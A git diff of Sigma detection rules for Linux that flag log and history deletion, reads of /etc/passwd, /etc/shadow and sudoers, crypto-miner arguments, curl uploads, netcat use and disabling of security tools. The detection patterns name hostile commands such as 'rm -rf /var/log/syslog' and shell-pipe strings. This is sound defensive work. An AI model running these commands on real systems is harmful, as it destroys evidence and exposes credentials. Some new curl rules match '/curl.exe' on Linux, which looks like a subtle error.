b/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml index a0c4b717f..42cdad2b6 100644 --- a/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml +++ b/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml @@ -4,20 +4,20 @@ status: experimental description: Detects the usage of the unsafe bpftrace option author: Andreas Hunkeler (@Karneades) tags: - - attack.execution - - attack.t1059.004 + - attack.execution + - attack.t1059.004 references: - - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ - - https://bpftrace.org/ + - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ + - https://bpftrace.org/ date: 2022/02/11 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection1: - Image|endswith: 'bpftrace' - CommandLine|contains: '--unsafe' - condition: selection1 + selection: + Image|endswith: 'bpftrace' + CommandLine|contains: '--unsafe' + condition: selection falsepositives: - - Legitimate usage of the unsafe option + - Legitimate usage of the unsafe option level: medium diff --git a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml index e9c822de9..5f7b9d5e7 100644 --- a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml +++ b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml @@ -4,21 +4,24 @@ status: test description: Detects the execution of a cat /etc/sudoers to list all users that have sudo rights author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/sleventyeleven/linuxprivchecker/ date: 2022/06/20 +modified: 2022/09/15 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: - - '/cat' - - 'grep' - CommandLine|contains: ' /etc/sudoers' - condition: selection + selection: + Image|endswith: + - '/cat' + - 'grep' + - '/head' + - '/tail' + CommandLine|contains: ' /etc/sudoers' + condition: selection falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: medium tags: - - attack.reconnaissance - - attack.t1592.004 + - attack.reconnaissance + - attack.t1592.004 diff --git a/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml b/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml index a3252ac28..115b209a0 100644 --- a/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml +++ b/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml @@ -4,7 +4,7 @@ status: stable description: Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion author: Ömer Günal, oscd.community date: 2020/10/07 -modified: 2022/07/07 +modified: 2022/09/15 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md logsource: @@ -15,6 +15,7 @@ detection: Image|endswith: - '/rm' # covers /rmdir as well - '/shred' + - '/unlink' CommandLine|contains: - '/var/log' - '/var/spool/mail' diff --git a/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml b/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml index 03cace922..42f0e639b 100644 --- a/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml +++ b/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml @@ -3,7 +3,7 @@ id: 3fcc9b35-39e4-44c0-a2ad-9e82b6902b31 status: experimental description: Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks date: 2021/10/15 -modified: 2022/07/07 +modified: 2022/09/15 author: Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC tags: - attack.defense_evasion @@ -20,6 +20,10 @@ detection: - 'rm -r /var/log/syslog' - 'rm -f /var/log/syslog' - 'rm -rf /var/log/syslog' + - 'unlink /var/log/syslog' + - 'unlink -r /var/log/syslog' + - 'unlink -f /var/log/syslog' + - 'unlink -rf /var/log/syslog' - 'mv /var/log/syslog' - ' >/var/log/syslog' - ' > /var/log/syslog' diff --git a/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml b/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml index 8295856a4..c9c7a3f80 100644 --- a/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml +++ b/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml @@ -3,7 +3,7 @@ id: ec127035-a636-4b9a-8555-0efd4e59f316 status: experimental description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. date: 2021/10/15 -modified: 2022/07/07 +modified: 2022/09/15 author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC tags: - attack.collection @@ -14,19 +14,13 @@ logsource: product: linux category: process_creation detection: - selection1: + selection: Image|contains: 'xclip' - selection2: - CommandLine|contains: - - '-selection' + CommandLine|contains|all: - '-sel' - selection3: - CommandLine|contains: - - 'clipboard' - 'clip' - selection4: - CommandLine|contains: '-o' - condition: all of selection* + - '-o' + condition: selection falsepositives: - Legitimate usage of xclip tools. level: low diff --git a/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml b/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml new file mode 100644 index 000000000..454af266f --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml @@ -0,0 +1,21 @@ +title: Remove Scheduled Cron Task/Job +id: c2e234de-03a3-41e1-b39a-1e56dc17ba67 +status: experimental +description: Detects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible +author: Nasreddine Bencherchali +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +date: 2022/09/15 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: 'crontab' + CommandLine|contains: ' -r' + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.defense_evasion diff --git a/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml b/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml index cc4e2eb28..4a66f1c96 100644 --- a/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml +++ b/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml @@ -3,36 +3,36 @@ id: 9069ea3c-b213-4c52-be13-86506a227ab1 status: experimental description: Detects command line parameters or strings often used by crypto miners references: - - https://www.poolwatch.io/coin/monero + - https://www.poolwatch.io/coin/monero date: 2021/10/26 author: Florian Roth logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - CommandLine|contains: - - ' --cpu-priority=' - - '--donate-level=0' - - ' -o pool.' - - ' --nicehash' - - ' --algo=rx/0 ' - - 'stratum+tcp://' - - 'stratum+udp://' - # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives - - 'sh -c /sbin/modprobe msr allow_writes=on' - # base64 encoded: --donate-level= - - 'LS1kb25hdGUtbGV2ZWw9' - - '0tZG9uYXRlLWxldmVsP' - - 'tLWRvbmF0ZS1sZXZlbD' - # base64 encoded: stratum+tcp:// and stratum+udp:// - - 'c3RyYXR1bSt0Y3A6Ly' - - 'N0cmF0dW0rdGNwOi8v' - - 'zdHJhdHVtK3RjcDovL' - - 'c3RyYXR1bSt1ZHA6Ly' - - 'N0cmF0dW0rdWRwOi8v' - - 'zdHJhdHVtK3VkcDovL' - condition: selection + selection: + CommandLine|contains: + - ' --cpu-priority=' + - '--donate-level=0' + - ' -o pool.' + - ' --nicehash' + - ' --algo=rx/0 ' + - 'stratum+tcp://' + - 'stratum+udp://' + # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives + - 'sh -c /sbin/modprobe msr allow_writes=on' + # base64 encoded: --donate-level= + - 'LS1kb25hdGUtbGV2ZWw9' + - '0tZG9uYXRlLWxldmVsP' + - 'tLWRvbmF0ZS1sZXZlbD' + # base64 encoded: stratum+tcp:// and stratum+udp:// + - 'c3RyYXR1bSt0Y3A6Ly' + - 'N0cmF0dW0rdGNwOi8v' + - 'zdHJhdHVtK3RjcDovL' + - 'c3RyYXR1bSt1ZHA6Ly' + - 'N0cmF0dW0rdWRwOi8v' + - 'zdHJhdHVtK3VkcDovL' + condition: selection falsepositives: - - Legitimate use of crypto miners + - Legitimate use of crypto miners level: high diff --git a/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml new file mode 100644 index 000000000..730ba33df --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml @@ -0,0 +1,22 @@ +title: Curl Usage on Linux +id: ea34fb97-e2c4-4afb-810f-785e4459b194 +status: experimental +description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server +author: Nasreddine Bencherchali +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +date: 2022/09/15 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/curl.exe' + condition: selection +falsepositives: + - Scripts created by developers and admins + - Administrative activity +level: low +tags: + - attack.command_and_control + - attack.t1105 diff --git a/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml b/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml index c47444781..564c37a36 100644 --- a/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml +++ b/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml @@ -1,7 +1,7 @@ title: Linux Doas Tool Execution id: 067d8238-7127-451c-a9ec-fa78045b618b status: stable -description: Detects the doas tool execution in linux host platform. +description: Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does. references: - https://research.splunk.com/endpoint/linux_doas_tool_execution/ - https://www.makeuseof.com/how-to-install-and-use-doas/ diff --git a/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml b/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml index 34ac9dccd..85ee9c4e2 100644 --- a/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml +++ b/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml @@ -1,9 +1,10 @@ title: File Deletion id: 30aed7b6-d2c1-4eaf-9382-b6bc43e50c57 status: stable -description: Detects file deletion using "rm" or "shred" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity +description: Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity author: Ömer Günal, oscd.community date: 2020/10/07 +modified: 2022/09/15 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md logsource: @@ -14,6 +15,7 @@ detection: Image|endswith: - '/rm' # covers /rmdir as well - '/shred' + - '/unlink' condition: selection falsepositives: - Legitimate administration activities diff --git a/rules/linux/process_creation/proc_creation_lnx_local_account.yml b/rules/linux/process_creation/proc_creation_lnx_local_account.yml index d839d854b..058e10b0e 100644 --- a/rules/linux/process_creation/proc_creation_lnx_local_account.yml +++ b/rules/linux/process_creation/proc_creation_lnx_local_account.yml @@ -6,7 +6,7 @@ author: Alejandro Ortuno, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md date: 2020/10/08 -modified: 2022/07/07 +modified: 2022/09/15 logsource: category: process_creation product: linux @@ -16,9 +16,13 @@ detection: selection_2: CommandLine|contains: '''x:0:''' selection_3: - Image|endswith: '/cat' + Image|endswith: + - '/cat' + - '/head' + - '/tail' CommandLine|contains: - '/etc/passwd' + - '/etc/shadow' - '/etc/sudoers' selection_4: Image|endswith: '/id' diff --git a/rules/linux/process_creation/proc_creation_lnx_local_groups.yml b/rules/linux/process_creation/proc_creation_lnx_local_groups.yml index aa30ec573..ba0b9cad7 100644 --- a/rules/linux/process_creation/proc_creation_lnx_local_groups.yml +++ b/rules/linux/process_creation/proc_creation_lnx_local_groups.yml @@ -6,7 +6,7 @@ author: Ömer Günal, Alejandro Ortuno, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md date: 2020/10/11 -modified: 2022/07/07 +modified: 2022/09/15 logsource: category: process_creation product: linux @@ -14,7 +14,10 @@ detection: selection_1: Image|endswith: '/groups' selection_2: - Image|endswith: '/cat' + Image|endswith: + - '/cat' + - '/head' + - '/tail' CommandLine|contains: '/etc/group' condition: 1 of selection* falsepositives: diff --git a/rules/linux/process_creation/proc_creation_lnx_nohup.yml b/rules/linux/process_creation/proc_creation_lnx_nohup.yml index 1b8abaea7..1c902a284 100644 --- a/rules/linux/process_creation/proc_creation_lnx_nohup.yml +++ b/rules/linux/process_creation/proc_creation_lnx_nohup.yml @@ -4,17 +4,17 @@ status: experimental description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io' references: - - https://gtfobins.github.io/gtfobins/nohup/ - - https://en.wikipedia.org/wiki/Nohup - - https://www.computerhope.com/unix/unohup.htm + - https://gtfobins.github.io/gtfobins/nohup/ + - https://en.wikipedia.org/wiki/Nohup + - https://www.computerhope.com/unix/unohup.htm date: 2022/06/06 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - Image|endswith: '/nohup' - condition: selection + selection: + Image|endswith: '/nohup' + condition: selection falsepositives: - - Administrators or installed processes that leverage nohup + - Administrators or installed processes that leverage nohup level: medium diff --git a/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml b/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml index 7b7fbcd02..b56b56825 100644 --- a/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml +++ b/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml @@ -26,4 +26,4 @@ detection: condition: selection_image and 1 of selection_cli* falsepositives: - Unknown -level: high \ No newline at end of file +level: high diff --git a/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml b/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml index 76ac81188..1fef2d0a7 100644 --- a/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml +++ b/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml @@ -1,18 +1,21 @@ title: Security Software Discovery id: c9d8b7fd-78e4-44fe-88f6-599135d46d60 status: test -description: Detects usage of system utilities (only grep for now) to discover security software discovery +description: Detects usage of system utilities (only grep and egrep for now) to discover security software discovery author: Daniil Yugoslavskiy, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md date: 2020/10/19 -modified: 2022/07/11 +modified: 2022/09/15 logsource: category: process_creation product: linux detection: selection: - Image|endswith: '/grep' + Image|endswith: + # You can add more grep variations such as fgrep, rgrep...etc + - '/grep' + - '/egrep' CommandLine|contains: - 'nessusd' # nessus vulnerability scanner - 'td-agent' # fluentd log shipper diff --git a/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml b/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml index b800cd73a..e48f83c9b 100644 --- a/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml +++ b/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml @@ -17,66 +17,66 @@ detection: selection_iptables_1: Image|endswith: '/service' CommandLine|contains|all: - - 'iptables' - - 'stop' + - 'iptables' + - 'stop' selection_iptables_2: Image|endswith: '/service' CommandLine|contains|all: - - 'ip6tables' - - 'stop' + - 'ip6tables' + - 'stop' selection_iptables_3: Image|endswith: '/chkconfig' CommandLine|contains|all: - - 'iptables' - - 'stop' + - 'iptables' + - 'stop' selection_iptables_4: Image|endswith: '/chkconfig' CommandLine|contains|all: - - 'ip6tables' - - 'stop' + - 'ip6tables' + - 'stop' selection_firewall_1: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'firewalld' - - 'stop' + - 'firewalld' + - 'stop' selection_firewall_2: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'firewalld' - - 'disable' + - 'firewalld' + - 'disable' selection_carbonblack_1: Image|endswith: '/service' CommandLine|contains|all: - - 'cbdaemon' - - 'stop' + - 'cbdaemon' + - 'stop' selection_carbonblack_2: Image|endswith: '/chkconfig' CommandLine|contains|all: - - 'cbdaemon' - - 'off' + - 'cbdaemon' + - 'off' selection_carbonblack_3: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'cbdaemon' - - 'stop' + - 'cbdaemon' + - 'stop' selection_carbonblack_4: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'cbdaemon' - - 'disable' + - 'cbdaemon' + - 'disable' selection_selinux: Image|endswith: '/setenforce' CommandLine|contains: '0' selection_crowdstrike_1: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'stop' - - 'falcon-sensor' + - 'stop' + - 'falcon-sensor' selection_crowdstrike_2: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'disable' - - 'falcon-sensor' + - 'disable' + - 'falcon-sensor' condition: 1 of selection* falsepositives: - Legitimate administration activities diff --git a/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml new file mode 100644 index 000000000..130d9b5c8 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml @@ -0,0 +1,26 @@ +title: Disable Or Stop Servicess +id: de25eeb8-3655-4643-ac3a-b662d3f26b6b +status: experimental +description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services +author: Nasreddine Bencherchali +date: 2022/09/15 +references: + - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html +tags: + - attack.defense_evasion +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: + - '/service' + - '/systemctl' + - '/chkconfig' + CommandLine|contains: + - 'stop' + - 'disable' + condition: selection +falsepositives: + - Legitimate administration activities +level: medium diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml new file mode 100644 index 000000000..a38c1ef16 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml @@ -0,0 +1,38 @@ +title: Suspicious Curl File Upload - Linux +id: 00b90cc1-17ec-402c-96ad-3a8117d7a582 +related: + - id: 00bca14a-df4e-4649-9054-3f2aa676bc04 + type: derived +status: experimental +description: Detects a suspicious curl process start the adds a file to a web request +author: Nasreddine Bencherchali +references: + - https://twitter.com/d1r4c/status/1279042657508081664 + - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76 + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file + - https://curl.se/docs/manpage.html + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +date: 2022/09/15 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/curl.exe' + CommandLine|contains: + - ' -F ' + - ' --form ' + - ' --form-string ' + - ' -T ' + - ' --upload-file ' + - ' -d ' + - ' --data ' + - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode" + condition: selection +falsepositives: + - Scripts created by developers and admins +level: medium +tags: + - attack.exfiltration + - attack.t1567 + - attack.t1105 diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml b/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml new file mode 100644 index 000000000..f38914616 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml @@ -0,0 +1,28 @@ +title: Suspicious Curl Change User Agents - Linux +id: b86d356d-6093-443d-971c-9b07db583c68 +related: + - id: 3286d37a-00fd-41c2-a624-a672dcd34e60 + type: derived +status: experimental +description: Detects a suspicious curl process start on linux with set useragent options +author: Nasreddine Bencherchali +references: + - https://curl.se/docs/manpage.html +date: 2022/09/15 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/curl' + CommandLine|contains: + - ' -A ' + - ' --user-agent ' + condition: selection +falsepositives: + - Scripts created by developers and admins + - Administrative activity +level: medium +tags: + - attack.command_and_control + - attack.t1071.001 diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml index 3727dee7e..1e893bf23 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml @@ -4,23 +4,30 @@ status: experimental description: Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md date: 2022/06/20 +modified: 2022/09/15 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/rm' - selection_history: - - CommandLine|contains: - - '/.bash_history' - - '/.zsh_history' - - CommandLine|endswith: '_history' - condition: all of selection* + selection: + Image|endswith: + - '/rm' + - '/unlink' + selection_history: + - CommandLine|contains: + - '/.bash_history' + - '/.zsh_history' + - CommandLine|endswith: + - '_history' + - '.history' + - 'zhistory' + condition: all of selection* falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: high tags: - - attack.impact - - attack.t1565.001 + - attack.impact + - attack.t1565.001 diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml index 93b722ac9..ffddb3b60 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml @@ -4,23 +4,31 @@ status: experimental description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md date: 2022/06/20 +modified: 2022/09/15 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/cat' - selection_history: - - CommandLine|contains: - - '/.bash_history' - - '/.zsh_history' - - CommandLine|endswith: '_history' - condition: all of selection* + selection: + Image|endswith: + - '/cat' + - '/head' + - '/tail' + selection_history: + - CommandLine|contains: + - '/.bash_history' + - '/.zsh_history' + - CommandLine|endswith: + - '_history' + - '.history' + - 'zhistory' + condition: all of selection* falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: medium tags: - - attack.reconnaissance - - attack.t1592.004 + - attack.reconnaissance + - attack.t1592.004 diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml b/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml index 5401c761c..29fd55f03 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml @@ -3,29 +3,28 @@ id: ea3ecad2-db86-4a89-ad0b-132a10d2db55 status: experimental description: Detects suspicious interactive bash as a parent to rather uncommon child processes references: - - Internal Research + - Internal Research date: 2022/03/14 author: Florian Roth logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: selection: - ParentCommandLine: 'bash -i' + ParentCommandLine: 'bash -i' anomaly1: - CommandLine|contains: - - '-c import ' - - 'base64' - - 'pty.spawn' + CommandLine|contains: + - '-c import ' + - 'base64' + - 'pty.spawn' anomaly2: - Image|endswith: - - 'whoami' - - 'iptables' - - '/ncat' - - '/nc' - - '/netcat' + Image|endswith: + - 'whoami' + - 'iptables' + - '/ncat' + - '/nc' + - '/netcat' condition: selection and 1 of anomaly* falsepositives: - - Legitimate software that uses these patterns + - Legitimate software that uses these patterns level: medium - diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml b/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml index 3d057b223..9f4e466ec 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml @@ -3,7 +3,7 @@ id: 880973f3-9708-491c-a77b-2a35a1921158 status: experimental description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell references: - - Internal Research + - Internal Research date: 2022/03/14 modified: 2022/07/26 author: Florian Roth @@ -11,26 +11,25 @@ tags: - attack.defense_evasion - attack.t1140 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - CommandLine|startswith: - - 'sh -c ' - - 'bash -c ' - selection_exec: - - CommandLine|contains: + selection: + CommandLine|startswith: + - 'sh -c ' + - 'bash -c ' + selection_exec: + - CommandLine|contains: - '| bash ' - '| sh ' - '|bash ' - '|sh ' - - CommandLine|endswith: + - CommandLine|endswith: - '| bash' - '| sh' - '|bash' - ' |sh' - condition: all of selection* + condition: all of selection* falsepositives: - Legitimate software that uses these patterns level: medium - diff --git a/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml b/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml index 4b718aee7..6f04b95d5 100644 --- a/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml +++ b/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml @@ -6,13 +6,13 @@ author: Ömer Günal and remotephone, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md date: 2020/10/06 -modified: 2022/07/11 +modified: 2022/09/15 logsource: category: process_creation product: linux detection: - selection1: - Image|endswith: + selection: + - Image|endswith: - '/firewall-cmd' - '/ufw' - '/iptables' @@ -22,9 +22,8 @@ detection: - '/ifconfig' - '/systemd-resolve' - '/route' - selection2: - CommandLine|contains: '/etc/resolv.conf' - condition: 1 of selection* + - CommandLine|contains: '/etc/resolv.conf' + condition: selection falsepositives: - Legitimate administration activities level: informational diff --git a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml index 7d638a7f8..0e2f4a456 100644 --- a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml +++ b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml @@ -4,20 +4,19 @@ status: experimental description: Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges author: Nasreddine Bencherchali references: - - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275 + - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275 date: 2022/07/05 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/sudo' - CommandLine|contains: 'execve_hijack' - condition: selection + selection: + Image|endswith: '/sudo' + CommandLine|contains: 'execve_hijack' + condition: selection falsepositives: - - Unlikely + - Unlikely level: high tags: - - attack.defense_evasion - - attack.privilege_escalation - + - attack.defense_evasion + - attack.privilege_escalation diff --git a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml index d29fef02a..f453de63c 100644 --- a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml +++ b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml @@ -4,24 +4,24 @@ status: experimental description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script author: Nasreddine Bencherchali references: - - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh + - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh date: 2022/07/05 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/sudo' - CommandLine|contains|all: - - ' tc ' - - ' enp0s3 ' - CommandLine|contains: - - ' qdisc ' - - ' filter ' - condition: selection + selection: + Image|endswith: '/sudo' + CommandLine|contains|all: + - ' tc ' + - ' enp0s3 ' + CommandLine|contains: + - ' qdisc ' + - ' filter ' + condition: selection falsepositives: - - Unlikely + - Unlikely level: high tags: - - attack.defense_evasion - - attack.t1014 + - attack.defense_evasion + - attack.t1014 diff --git a/rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml b/rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml new file mode 100644 index 000000000..2513bcf86 --- /dev/null +++ b/rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml @@ -0,0 +1,25 @@ +title: Remove Immutable File Attribute +id: 34979410-e4b5-4e5d-8cfb-389fdff05c12 +related: + - id: a5b977d6-8a81-4475-91b9-49dbfcd941f7 + type: derived +status: experimental +description: Detects usage of the 'chattr' utility to remove immutable file attribute. +author: Nasreddine Bencherchali +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +date: 2022/09/15 +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: 